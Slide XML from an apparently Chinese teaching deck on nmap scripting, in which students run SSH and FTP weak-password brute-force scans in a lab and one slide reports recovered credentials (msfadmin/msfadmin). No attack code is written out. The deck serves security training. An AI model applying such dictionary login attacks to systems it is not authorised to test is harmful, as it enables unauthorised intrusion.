            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956175" y="1333817"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.此时nmap脚本会利用用户名和列表字典，进行登录尝试，结果如图2-3-11所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956175" y="1978978"/>
            <a:ext cx="5276850" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956175" y="3522345"/>
            <a:ext cx="5080000" cy="1898015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-11 进行SSH弱密码暴力破解       可以发现，SSH服务的账号为msfadmin，密码为msfadmin。因此，nmap可以进行简单的安全测试，通过对这些服务进行脚本探测，可以发现系统存在的安全隐患。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771015" y="2780665"/>
            <a:ext cx="8825230" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>根据项目实施的两个步骤，完成nmap的FTP和SSH弱密码扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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8" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
